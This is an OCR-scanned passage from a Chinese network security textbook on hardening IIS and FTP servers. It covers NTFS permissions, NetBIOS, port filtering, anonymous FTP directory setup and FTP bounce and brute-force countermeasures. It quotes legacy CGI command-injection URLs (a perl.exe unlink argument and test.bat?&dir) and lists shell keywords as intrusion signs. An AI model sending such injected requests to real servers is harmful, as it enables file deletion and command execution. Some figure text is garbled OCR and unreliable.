网 络 应 用 服务 可 以 有 多 种 分 类 方法 。 一 些 典型 的 分 类 方法 有 : 按照 技术 特征 分 类 ， 点 
到 点 业务 与 点 到 多 点 业务 ; 按照 电信 业务 分 类 ， 基 础 电信 业务 和 增值 电信 业务 ; 按照 是 否 
经 营 分 类 ， 经 营 性 网 络 应 用 服务 与 非 经 营 性 网 络 应 用 服务 ;按照 所 传递 加 工 的 信息 分 类 ， 
自主 保护 、 指 导 保护 、 监 督 保护 、 强 制 保 护 与 专 控 保护 五 级 ， 按 照 服务 涉及 的 范围 分 类 ， 
公众 类 网 络 应 用 服务 与 非 公众 类 网 络 应 用 服务 。 

各 个 分 类 方式 从 不 同 角度 将 网 络 应 用 服务 进行 了 分 类 。 本 文采 用 公众 类 网 络 应 用 服务 
与 非 公众 类 网 络 应 用 服务 的 分 类 方法 。 

公众 信息 类 网 络 应 用 是 在 公众 网 络 范围 内 ， 信 息 发 送 者 不 指定 信息 接收 者 情况 下 的 网 
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络 应 用 。 信 息 发 送 者 将 信息 发 送 到 应 用 平台 上 ， 信 息 接收 者 主动 决定 是 否 通 过 网 络 接 收 信 
息 的 网 络 应 用 ， 信 息 发 送 者 在 一 定 范围 内 以 广播 或 组 播 的 方式 不 指定 信息 接收 者 强行 推送 
信息 。 公 众 信息 类 网 络 应 用 通常 涉及 网 络 媒体 ， 主 要 包括 有 BBS、 网 络 聊天 室 、WWW 服 
务 、IPTV、 具 有 聊天 室 功 能 的 网 络 游戏 等 应 用 。 

非 公众 信息 类 网 络 应 用 是 在 公众 网 络 范围 内 ， 信 息 发 送 者 指定 信息 接收 者 的 网 络 应 用 
以 及 非 公众 网 络 范围 内 的 网 络 应 用 。 非 公众 信息 类 网 络 应 用 类 型 中 ， 公 众 网 络 上 一 般 是 点 
到 点 的 信息 传播 的 网 络 应 用 , 主要 有 : 普通 QQ 应 用 、 普 通 MSN 应 用 、 普 通 E-mail、 PC2PC 
的 VoIP、 电 子 商务 等 应 用 。 


8.2 IIS Web 服务 器 的 安全 架设 


因为 IS( 即 Pntermet Information Server) 的 方便 性 和 易 用 性 ， 使 它 成 为 最 受 欢 迎 的 Web 
服务 器 软件 之 一 。 但 是 ，IIS 的 安全 性 却 一 直 令 人 担忧 。 如 何 利 用 IIS 建立 一 个 安全 的 Web 
服务 器 ， 是 很 多 人 关心 的 话题 。 


8.2.1 构造 一 个 安全 系统 


要 创建 一 个 安全 可 靠 的 Web 服务 器 ， 必 须要 实现 Windows 2000 和 IIS 的 双重 安全 ， 
因为 IS 的 用 户 同时 也 是 Windows 2000 的 用 户 , 并 且 TS 目录 的 权限 依赖 Windows 的 NTFS 
文件 系统 的 权限 控制 ,所 以 保护 IS 安全 的 第 一 步 就 是 确保 Windows 2000 操作 系统 的 安全 。 

1) 使 用 NTFS 文件 系统 

使 用 NTFS 文件 系统 ， 以 便 对 文件 和 目录 进行 管理 

2) ”关闭 默认 共享 

在 桌面 上 右 击 “网 上 邻居 ”选择 “属性 ”命令 ,在 弹出 的 “网 络 连 接 ” 窗 口中 右 击 “ 本 
地 连接 ”图 标 选择 “属性 ”命令 ， 在 弹出 的 对 话 框 中 选择 “Microsoft 网 络 的 文件 和 打印 机 
共享 ”， 然 后 单 击 “卸载 ”按钮 ， 即 可 完全 关闭 共享 。 

3) ”修改 共享 权限 

建立 新 的 共享 后 立即 修改 Everyone 的 默认 权限 ， 不 让 Web 服务 器 访问 者 得 到 不 必要 
的 权限 。 

4) “为 系统 管理 员 账号 更 名 ， 避 免 非 法 用 户 攻击 

右 击 “我 的 电脑 ”一 “管理 ”命令 ， 弹 出 “计算 机 管理 ”窗口 ， 在 “本 地 用 户 和 组 ” 
中 ， 右 击 “ 管 理 员 账号 (Administrator)”， 选 择 “ 重 命名 ”将 管理 员 账 号 修改 为 一 个 很 普通 
的 用 户 名 。 

5) ”禁用 TCP/IP 上 的 NetBIOS 

右 击 “网 上 邻居 ”， 选 择 “ 属 性 ”命令 ， 在 弹出 的 “网 络 连 接 ” 窗 口中 右 击 “本 地 连 
接 ” 图 标 ， 选择“ 属性 ”命令 ， 在 弹出 的 对 话 框 中 选择 “Internet 协议 (TCP/IP)”， 然 后 单 
击 “ 属 性 ”按钮 ， 在 弹出 的 对 话 框 中 单 击 “ 高 级 ”按钮 ， 弹 出 “高 级 TCP/IP 设置 ”对 话 框 ， 
选择 WINS 选项 卡 ， 单 选 下 侧 的 “禁用 TCP/IP 上 的 NetBIOS” 一 项 ， 即 可 解除 TCP/IP 上 
的 NetBIOS。 如 图 8-1 所 示 。 


外 


(@ 付 > 计算 机 网 络 安全 


高 级 TCPVIP 设置 


《TNS 地 址 乏 使 用 周 序 排列 ) 人 ) 


rr 二 
加 果 尼 用 UnsTS 搜索 ， 它 格 应 用 于 所 有 启用 TCP/IP 的 连接 。 
回 启 用 UnsTs 查询 Q) 导入 UnnsTs 加) 
MetaT0S 设置 
OR 同 
从 DHCP WetHTOS 设置 。 I 
凶 全 
BothI0S, 
OB TCPIT 上 的 了 ts 加 
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8-1 “高 级 TCP/IP 设置 ”对 话 框 


6)” ”TCP/IP 上 对 进 站 连接 进行 控制 
右 击 “ 网 上 邻居 ”选择 “属性 ”命令 ， 在 弹出 的 “网 络 连接 ”窗口 中 右 击 “本 地 连接 ” 


图 标 选择 “属性 ”命令 ， 


在 弹出 的 对 话 框 中 选择 “Internet 协议 (TCP/IP)”， 然 后 单 击 “ 属 


性 ”按钮 ， 在 弹出 的 对 话 框 中 单 击 “ 高 级 ”按钮 ， 弹 出 “高 级 TCP/IP 设置 ”对 话 框 ， 选 择 


“选项 ”选项 卡 ， 单 击 “ 


属性 ”按钮 。 在 弹出 的 “TCP/IP 筛选 ”对 话 框 中 单 选 “只 允许 ” 


选项 ， 再 单 击 “ 添 加 ”按钮 ， 在 弹出 的 “添加 筛选 器 ”对 话 框 中 填 入 “80”， 单 击 “ 确 定 ” 


按钮 ， 如 图 8-2 所 示 。 


TCP/IP 往 选 Tx 


7) ”修改 注册 表 ， 减 
打开 注册 表 : 将 


堂 漠 基 和 粹 竹 ”十 溢 民众 首相 也 如 台 


灰 启用 TCP/IP 第 选 所 有 适配器 ) 到 ) 


个 全 部 允许 全) 人 全 部 允许 四) 他 全 部 允许 加 ) 
G 只 允许 四 一 个 只 允许 如 一 一 个 只 人 许仙 一 一 


国 | 
80 
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8-2 “TCP /IP 筛选 ”对 话 框 
小 拒绝 服务 攻击 的 风险 


HKLM\System\CurrentControlSet\Services\Tcpip\Parameters 下 的 


SynAttackProtect 的 值 修改 为 2， 使 连接 对 超时 的 响应 更 快 。 


8.2.2 ”保证 1IS 自身 的 安全 性 


IIS 安全 安装 ， 要 构 妈 


一 个 安全 的 IS 服务 器 ， 必 须 从 安装 时 就 充分 考虑 安全 问题 。 
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(1) 不 要 将 IIS 安装 在 系统 分 区 上 。 

(2) 修改 IIS 的 安装 默认 路 径 。 

(3) 打上 Windows 和 IIS 的 最 新 补丁 。 

IIS 的 安全 配置 有 以 下 4 个 步骤 : 

(1) 删除 不 必要 的 虚拟 目录 。 

IS 安装 完成 后 在 wwwroot 下 默认 生成 了 一 些 目录 ， 包 括 ISHelp、IISAdmin、 
IISSamples、MSADC 等 ， 这 些 目录 都 没有 什么 实际 的 作用 ， 可 直接 删除 。 

(2) 删除 危险 的 IS 组 件 。 

默认 安装 后 的 有 些 IS 组 件 可 能 会 造成 安全 威胁 ， 例 如 Internet 服务 管理 器 (HTML)、 
SMTP Service 和 NNTP Service、 样 本 页 面 和 脚本 , 大 家 可 以 根据 自己 的 需要 决定 是 否 删除 。 

(3) 为 IS 中 的 文件 分 类 设置 权限 。 

除了 在 操作 系统 里 为 IIS 的 文件 设置 必要 的 权限 外 , 还 要 在 IS 管理 器 中 为 它们 设置 权 
限 。 一 个 好 的 设置 策略 是 : 为 Web 站 点 上 不 同类 型 的 文件 都 建立 目录 ， 然 后 给 它们 分 配 适 
当权 限 。 例 如 : 静态 文件 文件 夹 允许 读 、 拒 绝 写 ，ASP 脚本 文件 夹 允 许 执行 、 拒 绝 写 和 读 
取 ，EXE 等 可 执行 程序 允许 执行 、 拒 绝 读 写 。 

(4) 删除 不 必要 的 应 用 程序 映射 

IS 中 默认 存在 很 多 种 应 用 程序 映射 ， 除 了 ASP 的 这 个 程序 映射 ， 其 他 的 文件 在 网 站 
上 都 很 少 用 到 。 

在 “Internet 服务 管理 器 ”中 ， 右 击 网 站 目录 ， 选 择 “属性 ”， 在 “网 站 属性 ”对 话 框 
的 “ 主 目录 ”页 面 中 ， 如 图 8-3 所 示 ， 单 击 “ 配 置 ”按钮 ， 弹 出 “应 用 程序 配置 ”对 话 框 ， 
在 “有 映射” 页面 中 删除 无 用 的 程序 映射 ， 如 图 8-4 所 示 。 如 果 需 要 这 一 类 文件 时 ， 必 须 安 
装 最 新 的 系统 修补 补丁 ， 并 且 选 中 相应 的 程序 映射 ， 再 单 击 “ 编 辑 ” 按 钮 ， 在 “添加 /编辑 
应 用 程序 扩展 名 映射 ”对 话 框 中 选中 “确认 文件 是 否 存在 ”选项 ， 如 图 8-5 所 示 。 这 样 当 
客户 请 求 这 类 文件 时 ,ITS 会 先 检查 文件 是 否 存在 , 文件 存在 后 才 会 去 调用 程序 映射 中 定义 
的 动态 链接 库 来 解析 。 


图 8-3 “网 站 属性 ”对 话 框 


(> i 算 机 网 络 安全 


淹 洲 若 糖 半 ” 填 潍 祥 襄 睹 独到 并 双 


8-4 “应 用 程序 配置 ”对 话 框 


图 8-5 “添加 /编辑 应 用 程序 扩展 名 映射 ”对 话 框 


(5) 保护 日 志 安 全 。 

日 志 是 系统 安全 策略 的 一 个 重要 环节 ， 确 保 日 志 的 安全 能 有 效 提高 系统 整体 安全 性 。 

@ 修改 Is 日 志 的 存放 路 径 。 

默认 情况 下 ，IIS 的 日 志 存放 在 %WinDir%\System32\LogFiles， 黑 客 当 然 非 常 清楚 ， 所 
以 最 好 修改 一 下 其 存放 路 径 。 在 “Internet 服务 管理 器 ”中 ， 右 击 网 站 目录 ， 选 择 “ 属 性 ”， 
在 “网 站 属性 ”对 话 框 的 “网 站 ”页 面 中 ， 如 图 8-6 所 示 ， 在 选中 “启用 日 志 记录 ”的 情 
况 下 ， 单 击 旁 边 的 “属性 ”按钮 ， 在 “常规 ”页 面 中 单 击 “ 浏 览 ” 按 钮 或 者 直接 在 输入 杠 
中 输入 日 志 存放 路 径 即 可 ， 如 图 8-7 所 示 。 


图 8-6 “网 站 属性 ”对 话 框 
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8-7 “日 志 记录 属性 ”对 话 框 
@ 修改 日 志 访问 权限 。 
将 访问 权限 设置 为 只 有 管理 员 才 能 访问 。 
通过 以 上 的 一 些 安全 设置 ， 相 信 你 的 Web 服务 器 会 安全 许多 。 


8.2.3 ”提高 系统 安全 性 和 稳定 性 


web 服务 器 安全 预防 措施 : 

(1) 限制 在 Web 服务 器 开 账户 ， 定 期 删除 一 些 终 断 进程 的 用 户 。 

(2) 对 在 Web 服务 器 上 开 的 账户 , 在 口令 长 度 及 定期 更 改 方面 作出 要 求 , 防止 被 盗用 。 

(3) 尽量 使 fp、mail 等 服务 器 与 之 分 开 ， 去 掉 ftp、sendmail、 tftp、NIS、NFS、finger、 
netstat 等 一 些 无 关 的 应 用 。 

(4) 在 Web 服务 器 上 去 掉 一 些 绝对 不 用 的 shell 等 之 类 解释 器 , 即 当 在 你 的 cgi 的 程序 
中 没 用 到 perl 时 ， 就 尽量 把 perl 在 系统 解释 器 中 删除 掉 。 

(5) 定期 查看 服务 器 中 的 日 志 logs 文件 ， 分 析 一 切 可 疑 事件 。 在 errorlog 中 出 现 rm、 
login、/bin/perl、/bin/sh 等 之 类 记录 时 ， 你 的 服务 器 可 能 有 受到 一 些 非法 用 户 的 入 侵 的 

(6) 设置 好 Web 服务 器 上 系统 文件 的 权限 和 属性 , 对 可 让 人 访问 的 文档 分 配 一 个 公用 
的 组 如 : www， 并 只 分 配 它 只 读 的 权利 。 把 所 有 的 HTML 文件 归属 WWW 组 ， 由 Web 管 
理 员 管理 WWW 组 。 对 于 Web 的 配置 文件 仅 对 Web 管理 员 有 写 的 权利 。 

(7) 有 些 Web 服务 器 把 Web 的 文档 目录 与 FTP 目录 指 在 同一 目录 时 ， 应 该 注意 不 要 
把 FTP 的 目录 与 CGI-BIN 指定 在 一 个 目录 之 下 。 这 样 是 为 了 防止 一 些 用 户 通过 FTP 上 的 
一 些 犹如 PERL 或 SH 之 类 程序 用 Web 的 CGI-BIN 去 执行 造成 不 良 后 果 。 

(8) 通过 限制 许可 访问 用 户 卫 或 DNS， 如 : 


在 NCSA 中 的 access .conf 中 加 上 : 
<Directory /full/path/to/directory >; 


<Limit GET POST >; 
order mutual-failure 


deny from all 
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allow from 168.160.142. abc.net.cn 
</Limit >; 


</Directory >; 


这 样 只 能 是 以 域名 为 abc.net.cn 或 卫 属于 168.160.142 的 客户 访问 该 Web 服务器。 对 
于 CERN 或 WwW3C 服务 器 可 以 这 样 在 httpd.conf 中 加 上 : 


Protection LOCRL-USERS { 
GetMask @(*.capricorn.com，*.zoo.org，18.157.0.5) 


} 


Protect /relative/path/to/directory/* LOCAL-USERS 


(9) WINDOWS 下 HTITPD。 

@ Netscape Communications Server for NT。 

@ Perl 解释 器 的 漏洞 。 

Netscape Communications Server 中 无 法 识别 cgi-bin 下 的 扩展 名 及 其 应 用 关系 ， 如 : .pl 
是 PERL 的 代码 程序 自动 调用 perl.exe 文件 解释 ， 即 使 现在 也 只 能 把 perl.exe 文件 存放 在 
cgi-bin 目录 之 下 。 执行 如 : /cgi-bin/perl.exe?&my_script.pl. 但 是 这 就 给 任何 人 都 有 执行 perl 
的 可 能 , 当 有 些 人 在 其 浏览 器 的 URL 中 加 上 如 :/cgi-bin/perl.exe?&-etunlink+%3C#9%3E 时 ， 
有 可 能 造成 删除 服务 器 当前 目录 下 文件 的 危险 ,但 是 , 其 他 如 : O'Reilly WebSite 或 Purveyor 
都 不 存在 这 种 漏洞 。 

@ CGI 执 行 批 处 理 文件 的 漏洞 。 

文件 名 : test.bat: 


@echo off 
echo Content-type: text/plain 
echo 


echo Hello World! 


如 果 客 户 浏览 器 的 URL 为 : /cgi-bin/test.bat?&dir。 则 执行 调用 命令 解释 器 完成 dir 列 
表 。 这 给 访问 者 有 执行 其 他 命令 的 可 能 

© O'Reilly WebSite server for Windows NT/95。 

在 WebSitel.1B 以 前 的 版 本 中 使 用 配 处 理 文件 存在 着 Netscape 同样 的 漏洞 ， 但 是 ， 新 
版 关闭 .bat 在 cgi 中 的 作用 。 支 持 perl、VB 和 C 作为 CGI 开发 工具 。 至 于 它 的 安全 问题 参 
看 : http://Wwebsite.ora.com/devcomer/secalert] 。 

@ Microsoft's IIS Web Server。 

IS3.0 还 存在 一 些 安全 bug， 主 要 是 cgi-bin 下 的 覆盖 权利 。 

另外 ， 许 多 WEB 服务 器 本 身 都 存在 一 些 安全 上 的 漏洞 ， 都 是 在 版 本 升级 过 程 不 断 更 
新 。 在 这 就 不 一 一 列举 了 。 
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8.3 FTP 服务 器 的 安全 架设 


文件 传输 协议 (File Transfer Protocol，FTP) 是 一 个 被 广泛 应 用 的 协议 ， 它 使 得 我 们 能 够 
在 网 络 上 方便 地 传输 文件 。 早 期 FTP 并 没有 涉及 安全 问题 ， 随 着 互联 网 应 用 的 快速 增长 ， 
人 们 对 安全 的 要 求 也 不 断 提高 。 本 文 在 介绍 了 FTP 协议 的 基本 特征 后 ， 从 两 个 方面 探讨 了 
FTP 安全 问题 的 解决 方案 : 协议 在 安全 功能 方面 扩展 ， 协议 自身 的 安全 问题 以 及 用 户 如 何 
防范 。 


8.3.1 FTP 的 特性 


早期 对 FTP 的 定义 指出 , FTP 是 一 个 ARPA 计算 机 网 络 上 主机 间 文 件 传输 的 用 户 级 协 
议 。 其 主要 功能 是 方便 主机 间 的 文件 传输 ， 并 且 人 允许 在 其 他 主机 上 进行 方便 的 存储 和 文件 
处 理 。 而 现在 FTP 的 应 用 范围 则 是 Intemet。 

根据 FTP STD 9 定义 ，FTP 的 目标 包括 以 下 几 项 : 

(1) 促进 文件 (程序 或 数据 ) 的 共享 。 

(2) 支持 间接 或 隐 式 地 使 用 远程 计算 机 。 

(3) 使 存储 介质 对 用 户 透明 

(4) 可 靠 并 有 效 地 传输 数据 。 

关于 FTP 的 一 些 其 他 性 质 包 括 : FTP 可 以 被 用 户 在 终端 使 用 , 但 通常 是 给 程序 使 用 的 。 
FTP 中 主要 采用 了 传输 控制 协议 (Transmission Control Protocol，TCP) 和 Telnet 协议 。 因 此 
要 重视 协议 的 安全 问题 及 防范 措施 ， 下 面 介绍 几 种 存在 的 安全 问题 以 及 防范 措施 。 

1. 防范 反弹 攻击 (The Bounce Attack) 

DD) 漏洞 

FTP 规范 定义 了 “代理 FTP” 机 制 ， 即 服务 器 间 交 互 模型 。 支 持 客户 建立 一 个 FTP 控 
制 连接 , 然后 在 两 个 服务 间 传 送 文件 。 同 时 FTP 规范 中 对 使 用 TCP 的 端口 号 没有 任何 限制 ， 
而 从 0 一 1023 的 TCP 端口 号 保留 用 于 众所周知 的 网 络 服务 。 所 以 ， 通 过 “代理 FTP”， 客 
户 可 以 命令 FTP 服务 器 攻击 任何 一 台 机 器 上 众所周知 的 服务 。 

2) ”反弹 攻击 

客户 发 送 一 个 包含 被 攻击 的 机 器 和 服务 的 网 络 地 址 和 端口 号 的 FTP“PORT” 命令 。 这 
时 客户 要 求 FTP 服务 器 向 被 攻击 的 服务 发 送 一 个 文件 ， 这 个 文件 中 应 包含 与 被 攻击 的 服务 
相关 的 命令 (例如 :SMTP、NNTP)。 由 于 是 命令 第 三 方 去 连接 服务 ， 而 不 是 直接 连接 ， 这 样 
不 仅 使 追踪 攻击 者 变 得 困难 ， 还 能 避 开 基于 网 络 地 址 的 访问 限制 。 

3) ”防范 措施 

最 简单 的 办 法 就 是 封 住 漏洞 。 首 先 ， 服 务 器 最 好 不 要 建立 TCP 端口 号 在 1024 以 下 的 
连接 。 如 果 服 务 器 收 到 一 个 包含 TCP 端口 号 在 1024 以 下 的 PORT 命令 ， 服 务 器 可 以 返回 
消息 504( 定 义 为 “对 这 种 参数 命令 不 能 实现 ”)。 

其 次 ， 禁 止 使 用 PORT 命令 也 是 一 个 可 选 的 防范 反弹 攻击 的 方案 。 大 多 数 的 文件 传输 
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只 需要 PASYV 命令 。 这 样 做 的 缺点 是 失去 了 使 用 “代理 FTP” 的 可 能 性 ， 但 是 在 某 些 环境 
中 并 不 需要 “代理 FTP”。 

4 遗留 问题 

光 控 制 1024 以 下 的 连接 ， 仍 会 使 用 户 定义 的 服务 (TCP 端口 号 在 1024 以 上 ) 遭 受 反弹 
攻击 。 

2. 有 限制 的 访问 (Restricted Access) 


1) ”需求 

对 一 些 FTP 服务 器 来 说 ， 基 于 网 络 地 址 的 访问 控制 是 非常 渴望 的 。 例 如 ， 服 务 器 可 能 
希望 限制 来 自 某 些 地 点 的 、 对 某 些 文件 的 访问 (例如 为 了 某 些 文件 不 被 传送 到 组 织 以 外 )。 
另外 ， 客 户 也 需要 知道 连接 是 有 所 期 望 的 服务 器 建立 的 。 

2) ”攻击 

攻击 者 可 以 利用 这 样 的 情况 ， 控 制 连接 是 在 可 信任 的 主机 之 上 ， 而 数据 连接 却 不 是 。 

3) ”防范 措施 

在 建立 连接 前 ， 双 方 需要 同时 认证 远 端 主机 的 控制 连接 ， 数 据 连接 的 网 络 地 址 是 否 可 
信 ( 如 在 组 织 之 内 )。 

4) 遗留 问题 

基于 网 络 地 址 的 访问 控制 可 以 起 一 定 作用 ， 但 还 可 能 受到 “地 址 盗用 (spooD ”攻击 。 
在 spoof 攻击 中 ， 攻 击 机 器 可 以 冒 用 在 组 织 内 的 机 器 的 网 络 地 址 ， 从 而 将 文件 下 载 到 在 组 
织 之 外 的 未 授权 的 机 器 上 。 

3. 保护 密码 (Protecting Passwords) 

1) ”漏洞 

(1) 在 FTP 标准 [PR85] 中 ，FTP 服务 器 允许 无 限 次 输入 密码 。 

(2) “PASS” 命 令 以 明文 传送 密码 。 

2) ”攻击 

强力 攻击 有 两 种 表现 : 在 同一 连接 上 直接 强力 攻击 ， 和 服务 器 建立 多 个 并 行 的 连接 进 
行 强力 攻击 。 

3) ”防范 措施 

对 第 一 种 强力 攻击 ， 建 议 服务 器 尝试 限制 输入 正确 口令 的 次 数 。 在 几 次 尝试 失败 后 ， 
服务 器 应 关闭 和 客户 的 控制 连接 。 在 关闭 之 前 ， 服 务 器 可 以 发 送 返回 码 421( 服 务 不 可 用 ， 
关闭 控制 连接 )。 另 外 ， 服 务 器 在 相应 无 效 的 “PASS” 命 令 之 前 应 暂停 儿 秒 来 消减 强力 攻 
击 的 有 效 性 。 若 可 能 的 话 ， 目 标 操作 系统 提供 的 机 制 可 以 用 来 完成 上 述 建议 。 

对 第 二 种 强力 攻击 , 服务 器 可 以 限制 控制 连接 的 最 大 数目 , 或 探查 会 话 中 的 可 疑 行 为 ， 
并 在 以 后 拒绝 该 站 点 的 连接 请 求 。 

密码 的 明文 传播 问题 可 以 用 FTP 扩展 中 防止 窃听 的 认证 机 制 解决 。 

4) 遗留 问题 

然而 上 述 两 种 措施 的 引入 又 都 会 被 “业务 否决 ”攻击 ， 攻 击 者 可 以 故意 的 禁止 有 效用 
户 的 访问 。 
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4. 私密 性 (Privacy) 


在 FTP 标准 中 [PR85] 中 ， 所 有 在 网 络 上 被 传送 的 数据 和 控制 信息 都 未 被 加 密 。 为 了 保 
障 FTP 传输 数据 的 私密 性 ， 应 尽 可 能 使 用 强壮 的 加 密 系统 。 

5. 保护 用 户 名 (Usernames) 

1) 漏洞 

当 “USER ”命令 中 的 用 户 名 被 拒绝 时 , 在 FTP 标准 中 [PR85] 定 义 了 相应 的 返回 码 530。 
而 当 用 户 名 是 有 效 的 但 却 需要 密码 ，FTP 将 使 用 返回 码 331。 

2) 攻击 

攻击 者 可 以 通过 利用 USER 操作 返回 的 码 ， 确 定 一 个 用 户 名 是 否 有 效 。 

3) ”防范 措施 

不 管 如 何 ， 两 种 情况 都 返回 331。 

6. 端口 盗用 (Port Stealing) 


1) “漏洞 
当 使 用 操作 系统 相关 的 方法 分 配 端口 号 时 ， 通 常 都 是 按 增 序 分 配 。 
2) ”攻击 


攻击 者 可 以 通过 规律 ， 根 据 当前 端口 分 配 情况 ， 确 定 要 分 配 的 端口 。 他 就 能 做 手脚 ; 
预先 占领 端口 ， 让 合法 用 户 无 法 分 配 ; 窃听 信息 ;伪造 信息 。 

3) ”防范 措施 

由 与 操作 系统 无 关 的 方法 随机 分 配 端 口号 ， 让 攻击 者 无 法 预测 。 

7. 结论 

FTP 被 我 们 广泛 应 用 ， 自 建立 后 其 主 框架 相当 稳定 ， 二 十 多 年 没有 什么 变化 ， 但 是 在 
Intemet 迅 狐 发 展 的 形势 下 ， 其 安全 问题 还 是 日 益 突出 出 来 。 上 述 的 安全 功能 扩展 和 对 协议 
中 安全 问题 的 防范 ， 也 正 是 近年 来 人 们 不 懈 努 力 的 结果 ， 而 且 在 一 定 程度 上 缓解 了 FTP 的 
安全 问题 。 


8.3.2 匿名 FTP 的 安全 设 定 


在 网 络 上 ， 匿 名 FTP 是 一 个 很 常用 的 服务 ， 常 用 于 软件 下 载 网 站 、 软 件 交流 网 站 等 ， 
为 了 提高 匿名 FTP 服务 开放 过 程 中 的 安全 性 ， 我 们 就 这 一 问题 进行 一 些 讨论 。 

以 下 的 设 定 方 式 是 由 过 去 许多 网 站 累积 的 经 验 与 建议 组 成 。 我 们 认为 可 以 让 有 个 别 需 
求 的 网 站 拥有 不 同 设 定 的 选择 。 
1) FTP daemon 
网 站 必须 确定 目前 使 用 的 是 最 新 版 本 的 FTP daemon。 
2) ” 设 定 匿名 FTP 的 目录 
匿名 ftp 的 根 目录 (~ftp) 和 其 子 目录 的 拥有 者 不 能 为 fp 账号 ,或 与 fp 相同 群 组 的 账号 ， 
这 是 一 般 常见 的 设 定 问题 。 假 如 这 些 目录 被 fp 或 与 fp 相同 群 组 的 账号 所 拥有 ， 又 没有 做 
好 防止 写 入 的 保护 ， 入 侵 者 便 可 能 在 其 中 增加 文件 (例如 : .rhosts 档 ) 或 修改 其 他 文件 。 许多 
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网 站 允许 使 用 root 账号 。 让 匿名 FTP 的 根 目录 与 子 目 录 的 拥有 者 是 root， 所 属 族群 (group) 
为 system， 并 限定 存 取 权 ( 如 : chmod 0755)， 如 此 只 有 root 有 写 入 的 权力 ， 这 能 帮助 你 维 
持 FTP 服务 的 安全 。 

以 下 是 一 个 匿名 地 目录 的 设 定 范例 : 


drwxr-xr-x 7 root system 512 Mar 1 15:17 ./ 

drwxr-xr-x 25 root system 512 Jan 4 11:30 ../ 
drwxr-xr-x 2 root system 512 Dec 20 15:43 bin/ 
drwxr-xr-x 2 root system 512 Mar 12 16:23 etc/ 
drwxr-xr-x 10 root system 512 Jun 5 10:54 pub/ 


所 有 的 文件 和 链接 库 , 特别 是 那些 被 FTP daemon 使 用 和 那些 在 ~ftp/bin 与 ~ftp/etc 中 
的 文件 ， 应 该 像 上 面 范例 中 的 目录 那样 做 相同 的 保护 。 这 些 文件 和 链接 库 除 了 不 应 该 被 fp 
账号 或 与 ftp 相同 群 组 的 账号 所 拥有 之 外 ， 也 必须 防止 写 入 。 

3) ”使 用 合适 的 密码 与 群 组 文件 

我 们 强烈 建议 网 站 不 要 使 用 系统 中 的 /etc/passwd 作为 ~ftp/ete 目录 中 的 密码 文件 , 或 将 
系统 中 /etc/group 作为 ~ftp/etc 目录 中 的 群 组 文件 。 在 ~ftp/etc 目录 中 放置 这 些 文件 会 使 得 
入 侵 者 取得 它们 。 这 些 文件 是 可 自 定 的 而 且 不 是 用 来 做 存 取 控制 。 

我 们 建议 你 在 ~ftp/etc/passwd 与 ~ftp/etc/group 中 使 用 代替 的 文件 。 这 些 文件 必须 由 root 
所 拥有 。DIR 命令 会 使 用 这 代替 的 文件 来 显示 文件 及 目录 的 拥有 者 和 群 组 名 称 。 网 站 必须 
确定 ~/ftp/etc/passwd 档 中 没有 包含 任何 与 系统 中 /etc/passwd 文件 中 相同 的 账号 名 称 。 这 
些 文件 应 该 仅仅 包含 需要 显示 的 FTP 阶层 架构 中 文件 与 目录 的 拥有 者 与 所 属 群 组 名 称 。 此 
外 ， 确 定 密码 字段 是 “整理 ”过 的 。 例 如 使 用 「#*」 来 取代 密码 字段 。 

以 下 为 cert 中 匿名 ftp 的 密码 文件 范例 : 


ssphwg:*:3144:20:Site Specific Policy Handbook Working Group: : 
cops:*:3271:20:COPS Distribution: : 

Cert:*:9920:20:CERT:: 

tools:*:9921:20:CERT Tools:: 

ftp:*:9922:90:Anonymous FTP:: 

nist:*:9923:90:NIST Files:: 

以 下 为 cert 中 匿名 ftp 的 群 组 文件 范例 

Gertse"205 


ftp:*:90: 


在 你 的 匿名 fp 提供 可 写 入 的 目录 。 

让 一 个 匿名 ftp 服务 允许 使 用 者 储存 文件 是 有 风险 存在 的 .我 们 强烈 建议 网 站 不 要 自动 
建立 一 个 上 传 目 录 ， 除非 已 考虑 过 相关 的 风险 , CERT/CC 的 事件 回报 成 员 截 获 许多 使 用 上 
传 目 录 造 成 非法 传输 版 权 软件 ， 或 交换 账号 与 密码 信息 的 事件 。 也 截获 恶意 地 将 系统 文件 
灌 报 造成 denial of service 问题 。 

本 节 在 讨论 利用 三 种 方法 解决 这 个 问题 : 第 一 种 方法 是 使 用 一 个 修正 过 的 FTP 


daemon: 
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第 二 个 方法 是 提供 对 特定 目录 的 写 入 限制 ， 第 三 种 方法 是 使 用 独立 的 目录 。 


1. 修正 过 的 FTP daemon 


假如 你 的 网 站 计划 提供 目录 用 来 做 文件 上 传 ,我 们 建议 使 用 修正 过 的 FTP daemon 对 文 
件 上 传 的 目录 做 存 取 的 控制 。 这 是 避免 使 用 不 需要 的 写 入 区 域 的 最 好 方法 。 以 下 有 一 些 


建议 : 

(1) 限定 上 传 的 文件 无 法 再 被 存 取 ， 如 此 可 由 系统 管理 者 检测 后 ， 再 放置 于 适当 位 置 
供 人 下 载 。 

(2) 限制 每 个 联机 的 上 传 资料 大 小 。 

(3) 依照 现 有 的 磁盘 大 小 限制 数据 传输 的 总 量 。 

(4) 增加 登录 记录 以 提前 发 现 不 当 的 使 用 。 


若 你 欲 修改 FTP daemon， 你 应 该 可 以 从 厂商 那里 拿 到 程序 代码 , 或 者 你 可 从 下 列 地 方 
取得 公开 的 FTP 程序 原始 码 : 


wuarchive.wustl.edu ~ftp/packages/wuarchive-ftpd 


ftp.uu.net ~ftp/systems/unix/bsd-sources/libexec/ftpd 


gatekeeper.dec.com ~ftp/pub/DEC/gwtools/ftpd.tar.Z 
CERT/CC 并 没有 正式 地 对 所 提 到 的 FTP daemon 做 检测 、 评 估 或 背书 。 要 使 用 何 种 FTP 


daemon 


由 每 个 使 用 者 或 组 织 负责 决定 ， 而 CERT/CC 建议 每 个 机 关 在 安装 使 用 这 些 程序 之 


前 ， 能 做 一 个 彻底 的 评估 。 

2. 使 用 保护 的 目录 

假如 你 想 要 在 你 的 FTP 站 提供 上 传 的 服务 ， 而 你 又 没 办 法 去 修改 FTP daemon， 我 们 
就 可 以 使 用 较 复杂 的 目录 架构 来 控制 存 取 。 这 个 方法 需要 事先 规划 ， 并 且 无 法 百分之百 防 
止 FTP 可 写 入 区 域 遭 不 当 使 用 ， 不 过 许多 FTP 站 仍 使 用 此 方法 。 

为 了 保护 上 层 的 目录 (~ftp/incoming)， 我 们 只 给 匿名 的 使 用 者 进入 目录 的 权限 (chmod 
751 ~ftp/incoming)。 这 个 动作 将 使 得 使 用 者 能 够 更 改 目录 位 置 (cd)， 但 不 允许 使 用 者 监视 目 


录 内 容 。 


Ex: 


